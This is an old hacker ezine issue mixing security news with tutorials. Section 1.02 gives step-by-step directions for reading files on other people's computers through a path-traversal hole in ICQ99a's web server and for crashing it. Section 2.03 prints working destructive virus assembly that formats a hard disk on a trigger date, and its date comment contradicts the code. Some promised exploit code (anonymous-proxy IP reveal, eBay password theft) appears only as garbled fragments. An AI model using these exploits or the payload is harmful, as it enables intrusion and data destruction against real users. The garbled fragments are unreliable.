Antidote Volume: 2 Issue: 1
(May 99)
____________________________________________________________________________________________________
| ________________________________________________________________________________________________ |
| | | |
| | ___ \ \ /\ | , | | \ \ ____ | |
| | ___ ___ \ \ / \ ___ | | | ___ \ \ ____ ____ | |
| | ___ \ \ |ŻŻŻŻ| Í | |ŻŻ Ż| |ŻŻŻ| |ŻŻŻ| |ŻŻ /___\ \ \ ____ | |
| | \ \ | | I I I__/ _|_ |___| |___| I__/ |____ \ \ | |
| |________________________________________________________________________________________________| |
|____________________________________________________________________________________________________|
------------------------------
Well here is another ezine put out by Antidote. This is our 5th issue that has come out. We have
over 300 subscribers so far and we hope to get more. Please keep in mind that this is an educational
ezine in wich we are not responsible for any information on here that you might use in the wrong and
improper way. Also, please keep in mind that just because we 'print' this information, that it
doesn't mean that we made the thing or the exploit up. Most everything in this magazine is made by
someone else and is recieved second hand (sent to us), in wich is printed/posted on here by us.
------------------------------
--=\\Contents\\=--
0.00 - Beginning
0.01 - What?
0.02 - Complaints
0.03 - Sending Articles
0.04 - FAQ
1.00 - News & Exploits
1.01 - Anonymous Surfing
1.02 - ICQ99a Security Glitches
1.03 - Intruder Alert '99
1.04 - eBayla Bug
1.05 - Cold Fusion Vulnerability
2.00 - Misc.
2.01 - Configuring HardDrives
2.02 - Basic UNIX Commands
2.03 - PBBSER's code column
------------------------------
--=\\0.00\\=--
--------------
0.01 --=\\What?\\=--
What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be
wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and
happenings in the underground world. We aren't going to teach you how to hack or anything, but we
will supply you with the current information and exploits. Mainly Antidote is just a magazine for
people to read if they have some extra time on there hands and are bored with nothing to do. If you
want to read a magazine that teaches you how to hack etc, then you might want to go to your local
bookstore and see if they carry '2600'.
------------------------------
0.02 --=\\Complaints\\=--
Our last issue we got a lot of complaints about the content. Well, this is not our fualt now is it?
It might be in some ways, but you all have to submit things to us so we can post them in here and
have better content and articals etc... For submitting and rules, please see 0.03 (Sending Articles).
------------------------------
0.03 --=\\Sending Articles\\=--
As many of you know, we are always open to articles/submittings. We will take almost anything that
has to do with computer security. This leaves you open for:
-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....
The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com"
was hacked... But if you have an opinion about the hacks that is fine. If you have any questions
about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with
your question and he will answer it.
Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one
that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has
written about/on this topic so that way you don't waste your time on writing something that won't
be published. An example of this would be:
If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then
Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because
he sent it in first.
But keep in mind, we might use your article for the next issue! If you have something that you would
like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and we will
review the article and put it in Antidote (if we like it).
------------------------------
0.04 --=\\FAQ\\=--
Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions".
Please read this before e-mailing us with questions and if the question isn't on here or doesn't
make sense, then you can e-mail us with your question.
> What exactly is "Antidote"?
See section 0.01 for a complete description.
> I find Antidote to not be shot for the beginner or does not teach you the basics, why is that?
Antidote is for everyone, all we are basically is a news ezine that comes out once a month with
the current news, exploits, flaws and even programming. All of the articles that are in here are
recieved second hand (sent to us) and we very rarely edit anyone's articles.
> I just found Antidote issues on your webpage, is there anyway I can get them sent to me through
e-mail?
Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your
e-mail address. You will recieve Antidote the second we release it and it will be sent as an
attachment
> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.
> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be
published above your article (when sending it to us) and we will do what you say.
> I submitted something and I didn't see it in the current/last issue, why is that?
It could be that someone else wrote something similar to what you wrote and they sent it to us
first. If you sent us something and we didn't e-mail you back, then you might want to send it
again because we probably didn't get it (we respond to all e-mails no matter what). We might
use your article in future issues of Antidote.
> Can I submit something that I didn't "discover" or "write"?
Yes you can, we take information that is written by anyone regardless if you wrote it or not.
Well thats it for our FAQ. If you have a question that is not on here or the question is on here
and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and
he will answer your question. This FAQ will probably be updated every month.
------------------------------
--=\\1.00\\=--
--------------
1.01 --=\\Anonymous Surfing\\=--
A couple of weeks ago there was a message posted on alt.comp.virus claiming that the "anonymous"
web surfing programs are unsecure and are easily bypassed with various JavaScript writings.
One of the flaws just refreshes the current page 'killing' the proxy on your side, thus, revealing
your true IP address. The other one just 'pulls' your true IP address, but doesn't work in IE4.
These flaws have been found in the fallowing Anonymous Surfing Providers:
Anonymizer (http://www.anonymizer.com)
Bell Labs (http://www.bell-labs.com/project/lpwa)
Naval Research Laboratory (http://www.onion-router.net)
Aixs (http://aixs.net/aixs/)
Here is the coding for 'pulling' the true IP address from the 'victims' computer. Though, it
doesn't work with IE. This script can be viewed at:
http://www.tiac.net/users/smiths/js/livecon/index.htm in wich we claim/have no affiliation with.
Here is the JavaScript, put this in the 'body' of your webpage to take off anonymous surfing:
| Expression | Result |
Comments |
|---|
-Lord Oak (submitted by)
lordoak@thepoison.org
------------------------------
1.02 --=\\ICQ99a Security Glitches\\=--
As most people know, ICQ99a comes with a HTTPD in wich is found to be insecure. It has a lot of
vulnerablilities in wich one of them allows you to access someone's computer (remotely) and the
other one will crash their ICQ99a. These vulnerabilities only work on versions 1700 or lower.
How do you know if someone is running ICQ99a's HTTPD server? Well, when the user is online, look
to the right of their nick-name, and if there is a little house next to it, then they are running
it. Here is how they work:
The first one allows you to get into someone's computer (remotely). This enables you to make
any edits to their system you want. All you have to do is get the victims IP number. You can do
this by clicking on their nick-name and then going to "info". If they have it hidden, then you
can go to: http://members.icq.com/number and then put your mouse over one of the links on there
page and see where it is linking too, it should be something like: http://24.93.212.1/page.html
Not nessacarly that number, but any number. Now copy their IP address (from the link) and then
all you have to do is go 'up' a couple of directories in wich allows you to access there
computer. The only thing, is that they only allow .html files to be retrieved by your web
browser. So, all you have to do is add a /.html/ to the URL and it will think that you are trying
to proccess a .html file and it will let you view the directory. The URL should look something
like this:
http://127.0.0.1/.html/../../../../../../config.sys
You can add as many /../ files as you want to, it will just take you 'up' one more directory.
The second one allows you to crash the users ICQ99a. This one is easier then the other one. All
you have to do is get the users IP address (see the first one on how to get it) and then telnet
to their IP and Port Number '80'. It won't say anything after you are connected. After you are
connected, just type in a "Unknown String" or just a command that doesn't excist (ex: dfsdfh).
-Lord Oak (submitted by)
lordoak@thepoison.org
------------------------------
1.03 --=\\Intruder Alert '99\\=--
[copied from www.bonzi.com/intruderalert/ia99.htm]
Intruder ALERT '99 is a one of a kind Internet utility that can now notify you if someone is
trying to break in to your computer, stop them dead in their tracks, and even build a visual map
showing you the Intruder's ISP (Internet Service Provider) allowing you to visually see where the
Intruder is located and report them! You can now browse the Internet with the comfort and security
of knowing that no one from the Internet can access your computer without your knowledge or
permission!
Everytime you browse the Internet, send e-mail, or submit any private information to a web site,
you broadcast your computer's unique IP Address over the Internet. With this IP address, someone
can immediately begin trying to break into your computer without you even knowing it! Until now,
there has been no way of telling if this has happened or any way of stopping it! Well not anymore!
Intruder ALERT Attack Log:
IntruderALERT '99 is more than just protection against Internet Intruder's, it allows you to track
down your Intruder's ISP (Internet Service Provider) contact information and report the attack. This
allows you to contact the Intruder's ISP and make them aware that someone on their network has tried to
attack your computer. In most cases, they have the power to find out who the Intruder is and prevent
any future attacks. With the IntruderALERT '99 built in 'Attack Log', you can know the date, time, IP
Address, and Port Number used by the Intruder in the attack.
Mapping of the Intruder's ISP Location:
Intruder ALERT '99 can actually track down and give you a visual map of your Intruder's ISP location,
allowing you to see where your attacker came from! This allows you to see where in the world your
attacker is located. NOTE: This is a map of the ISP (Internet Service Provider) that the attacker is
using to get their Internet access.
Built In Port Management:
Intruder ALERT has a built in "Port Manager" allowing you an extra level of security. You can customize
the ports that Intruder ALERT will monitor to catch Intruders trying to break into your computer.
This is very handy when you suspect someone is trying to hurt you.
The Easiest Way to Protect Your PC from Intruders!
IntruderALERT '99 is easy-to-use! Once installed, you can go about your work without a worry. It runs
silently in the background protecting you. Every time you turn on your computer, IntruderALERT '99 starts
working automatically, only leaping into action when suspicious connection attempts are made to your computer.
Windows Sources Magazine:
The feature article in the November, 1997 issue of Windows Sources Magazine titled How to Practice Safe
Browsing reports the following: "Behind these headlines lie two fundamental concerns: fear that your browser
will let a malicious or ill-behaved program corrupt data on your PC and fear that a loophole in your browser
will give hackers access to your Web session so they can steal personal information while you're online. Both
Microsoft and Netscape have gone to great pains to make you feel secure using their browsers, stressing the
extremely small chance you'll fall prey to hackers. But neither company can anticipate every problem, so don't
expect the headlines to stop anytime soon."
http://www.bonzi.com/intruderalert/ia99.htm
------------------------------
1.04 --=\\eBayla Bug\=--
[copied from www.because-we-can.com]
[additions by Lord Oak]
This page describes a security problem that Blue Adept discovered with eBay's on-line auctions on March 31,
1999 (realaudio interview). The security hole allows eBay users to easily steal the passwords of other eBay
users. The exploit involves posting items for bid that include malicious javascript code as part of the item's
description. When an unsuspecting eBay user places a bid on the item, the embedded javascript code sends their
username and password to the malicious user by e-mail. From the victim's point of view, nothing unusual seems
to have occured, so they are unlikely to report/complain to eBay.
Once a malicious user knows the username/password of the victim's eBay account, she can assume full control of
the account, including the ability to:
-create new auctions (automtically charging the victim's account)
-place bids in the victim's name,
-retract legitimate bids in the victim's name,
-change the victim's username/password, barring them from eBay,
-associate bogus negative/positive comments with an arbitrary seller,
-prematurely close an auction being run by the victim.
-insert the ebayla code into the victim's auction.
-(The code could be altered to do this automatically, which would constitute an ebayla virus).
The security problem is dangerously easy to take advantage of. A malicious user needs only to embed the
javascript code into their description of an item for auction. A walk-through of the exploit demonstrates
step-by-step how any user can steal eBay passwords.
Blue Adept notified eBay that a 'huge' potential security problem existed on March 31,1999 and offered
assistance (but as of April 18, 1999 has only received form letter KMM798062C0KM in reply). Information about
the ebayla exploit is being made publicly available to speed the process of fixing the security hole.
Here is the current JavaScript code wich is used to steal the users/bidders Username and Password:
http://www.because-we-can.com
------------------------------
1.05 --=\\Cold Fusion Vulnerability\\=--
[copied from http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full]
Allaire Security Bulletin (ASB99-01)
Expression Evaluator Security Issues
Originally Posted: February 4, 1999
Summary
One of the sample applications installed with ColdFusion Server, the Expression Evaluator, exposes the ability
to read and delete files on the server. Allaire has released a patch that will limit access to the Expression
Evaluator to page requests made from the machine where it is installed. As an additional measure of protection,
Allaire recommends that customers not install (or remove existing) documentation, sample code, example
applications and tutorials on production servers and secure access to these files on workstations.
Issue
A range of sample code and example applications are provided with ColdFusion Server to assist customers in
learning and using the product. Among these is an application called the Expression Evaluator, which is
installed in the //CFDOCS/expeval/ directory. The Expression Evaluator lets users process expressions such
as 1 + 1 to see how ColdFusion expression evaluation works.
Used normally, the application is restricted to access from the local machine based on the 127.0.0.1 IP
address. However, some pages in the Expression Evaluator can be accessed directly, exposing the ability to read
and delete files anywhere on the server where the evaluator is installed.
Affected Software Versions
Cold Fusion Application Server 2.0 (all editions)
Cold Fusion Application Server 3.0 (all editions)
Cold Fusion Application Server 3.1 (all editions)
ColdFusion Server 4.0 (all editions)
What Allaire is Doing
Allaire has released a patch that modifies the Expression Evaluator so that all the pages in the Evaluator are
restricted to access from the local machine where the Expression Evaluator is installed based on the 127.0.0.1
IP address.
Download - ColdFusion Expression Evaluator Security Patch (Windows NT)
Download - ColdFusion Expression Evaluator Security Patch (Solaris)
What Customers Should Do
Customers should run the patch on all of their systems where the Expression Evaluator is installed.
http://www1.allaire.com/handlers/index.cfm?ID=8727&Method=Full
------------------------------
--=\\2.00\\=--
--------------
2.01 --=\\Configuring HardDrives\\=--
I wrote this text because the avergae computer user has no idea how to install a hd and partion it
and i thought it whould prove useful so you can be just like me and install as many as you want well
if you dont like this article bitch at g0at@fuckme.com
So, here is what you need to do:
1) Turn off your PC and monitor
2) Remove the power cord from the back of your PC
3) Remove the screws from the back of your PC
4) Check the instructions that were shipped with the hard drive and set the jumpers to either
Master without a slave, Master with a slave,or slave Copy on to a paper the drive type , the
number of cylinders ,heads,and sectors ,that is printed on the top of the drive, you will need
this later on in installation.
5) Mount the drive into the bay in the PCs case
6) Next check the controller board instructions for any switches or jumper that may need to be set.
7) Attach the cables to the drive. There will be two cables, one with 40 wires, and one with 4
wires. On the cable with 40 wires ( this is your I D E cable) one side will have a colored
stripe ; this is pin one. Pin one on the hard drive is usually located on the side close to
the connection for the power cable. It is possible to connect the cable backwards. To avoid
this , look at the disk drive connectors for a space or line between pin 2 and 3. The ribbon
side with the colored pin goes on this side
8) Attach the power cable , the cable with four wires, from the hard drive to the PCs power supply.
9) You are ready to replace the PCs cover and screws.
10)You will need to edit your CMOS table regarding your new hard drive. When you boot up your PC,
you will see a key combination to run set up . At this point enter the cylinders, heads, and
sectors that you copied down from the label on the drive.You should use autodetect in your
set up if your CMOS allows.
11)Save and exit Set up.Let your computer boot up.You are now ready to partition your hard drive.
*******************************Partitioning A Hard Drive*****************************************
1) Boot up your machine from your floppy drive with a bootable disc and type:
DIR X: [ENTER]
X Being the letter that you have assigned the drive
If you see a README.TXT file or a similar file name, proceed with the instructions indicated
on that file for installing your hard drive.
2) If you see the following error message:Invalid drive specification insert a disc that contains
the DOS command FDISK and FORMAT into drive A:. Do not low level format your hard drive. This
was already done by the manufacturer at the factory. The FORMAT command that you will be giving
in DOS is a high level format. At the A: prompt type FDISK x [Enter], and you will see the
following screen
MS-DOS Version 6.00 Fixed Disc Setup Program
(C) Copyright Microsoft Corp
Choose the following:
1. Create DOS partion or Logical DOS Drive
2. Set active Partition
3. Delete Partition or Logical DOS Drive
4. Display partition information
Enter Choice: [1]
Press Esc to exit FDISK
Current Fixed Drive :1
1. Create Primary DOS Partition
2. Create Extended DOS Partition
3. Create logical DOS drive(s) in the Extended DOS partition
Enter Choice: [1]
For problems or help with this, please feel free to e-mail me at: oxidation@progenic.com and i will
try to get back to you as soon as possible.
-oX1dation
oxidation@progenic.com
------------------------------
2.02 --=\\Basic UNIX Commands\\=--
This is a list of some basic *nix commands that should work on any unix flavour system. Keep in mind
that all the possible args are not written for each command (just the most common ones in my opinion)...
and you can find more about any command by typing 'man [command]'.
*** Super Common ***
ls: lists files and directories
-a: lists all files
-s: print with file size
ls [directory]: lists contents of directory
dir: like ls
vdir: like ls... what 'ls' usually shows if you are in an ftp session
cd: change directory
cat: print the contents of a file to STDIN
more: like cat except pauses after each screenfull until you press a char
less: like more except you can go down by line as well as screenfull and
go back up
*** Still Very Common ***
grep: searches a file for a string and prints out the line that contains it
find: searches for a file/directory...
common usage: find / -name filetofind
cp: copy files
echo: echos something back to you
-e '\a': echo's a bell... can be used sometimes in replace or
sound
cc: c compiler
Usual usage: cc -o file file.c
date: prints date
gcc: gnu c compiler (better than cc in my opinion)
Usual usage: gcc -o file file.c
g++: gnu C++ compiler
Usual usage: g++ -o file file.cpp
gzip: zip's a file (.gz)
gunzip: unzips it
kill: kill's a process
mail: shows what mail you have
mkdir: make a director
mount: mount's a partition/harddrive, floppy, cdrom, ect...
Check /dev/ for the right names in fd0, hda1, or cdrom don't work
mount floppy usually as root:
mkdir /mnt/floppy
mount /dev/fd0 /mnt/floppy
mount windows partition as root:mkdir /mnt/win
mount /dev/hda1 /mnt/win
mount cdrom as root:
mkdir /mnt/cdrom
mount /dev/cdrom /mnt/cdrom
(ignore messages about having to mount in read only mode)
mv: renames files
netstat: shows open network connections
pwd: shows current directory
sleep: pauses for desired amount of time... useful in programming
in C: system("sleep 2");
su: change user/uid... typing just 'su' is the same as typing 'su root'
tar: an archiving utility
-zxvf: automatically gunzips and untar's a file (for .tgz's or
.tar.gz's)
unzip: unzip files with .zip extentions
That's all for now. Feel free to email questions to the author of this (PBBSER) at
pbbser@legionoot.hypermart.net and check out www.legionoot.cc for program releases or the LegionOOT
Ezine, and http://Sek-Check.hypermart.net for security auditing for no money.
------------------------------
2.03 --=\\PBBSER's code column\\=--
Alright a little intro now. This is my first code column in Antidote
although I wrote a tutorial in basic x86 asm for Antidote #1. Well
enough of the bullshit intro here is this zine's code column.
This is part of a virus taken from antionline's virus archive. And
don't bother giving me shit about going to antionline, they got a
decent virus archive and I actually like www.anticode.com but I do
hate JP. Also this is a _very_ dangerous portion of code if written
into a program and run. It can potentially format your harddrive.
This tutorial was written to show how you _could_ do something and is
not instructions on how to actually do it.
This is copied exactly from
http://www.antionline.com/archives/virii/U/UTILITY.ASM so if you do
something stupid with this it isn't my fault, it's either the writer
of this virus or JP for posting it's. Here it is:
;****************************************************************************
;*
;* UTILITY.ASM - Manipulation Task Code For Casper The Virus. *
;* *
;* USAGE: Is automatically INCLUDED in the assembly of casper.asm *
;* *
;* DETAILS: Date Activated Hard Disk Destroyer. *
;* DATE: 1st April DAMAGE: Formats Cylinder 0 of HD. *
;* *
;**************************************************************************
mov ah,2ah ; DOS Get Date.
int 21h
cmp dx,0401h ; 5th May.
jne utilend
mov ax,0515h ;Format Cylinder, 15 Sectors.
mov ch,0 ;Cylinder 0.
mov dx,00 ;Head 0, Drive 80h.
mov es,dx ;Junk for address marks.
mov bx,0 ;Junk....
int 13h ;Do It!
int 20h ;Exit
utilend: jmp entry3
db "Hi! I'm Casper The Virus, And On April The 1st I'm "
db "Gonna Fuck Up Your Hard Disk REAL BAD! "
db "In Fact It Might Just Be Impossible To Recover! "
db "How's That Grab Ya! "
entry3:
*** end of cut and back to PBBSER ***
Well for something so simple this is pretty well commented so I guess I
don't have to provide to detailed an explanation. Now I like fun virii,
whether they be without a payload or with a funny one but formatting
stuff just sucks. Now no one think's 'Casper' is more elite because he
added these few destructive lines of code. So why did he do it?!@@#$
If you can possibly answer that please email pbbser@legionoot.hypermart.net
with your answer.
Well sorry this column didn't show you anything really useful or teach you
much but I thought that anyone involved in the h/p/c/v scene shold know how
blatently 'gay' virii that format harddrives are.
Next issue the topic for this column is up to the readers. Email:
pbbser@legionoot.hypermart.net with potential topics and I will try to do a
tutorial on it. Also if it is a language specific topic it must be either:
C, C++, Perl, x86 Assembly, TCL, Batch or Bash Shell scripting because those
are the only languages I consider myself good enough to bother sharing
knowledge in. Also if you have no creativity vote for one of my ideas:
1. Com overwriting virii (Would be a good tutorial but has been done before
multiple times... if you can't figure out codebreakers tutorial vote this)
2. Intro to C Sockets with lots of example source
3. Intermediate C Sockets (constructing packets & junk)
4. Win32 Assembly With Tasm5 (I have found no tutorials with matching working
source so vote this if you wanna learn assembly without going the long way I
did)
------------------------------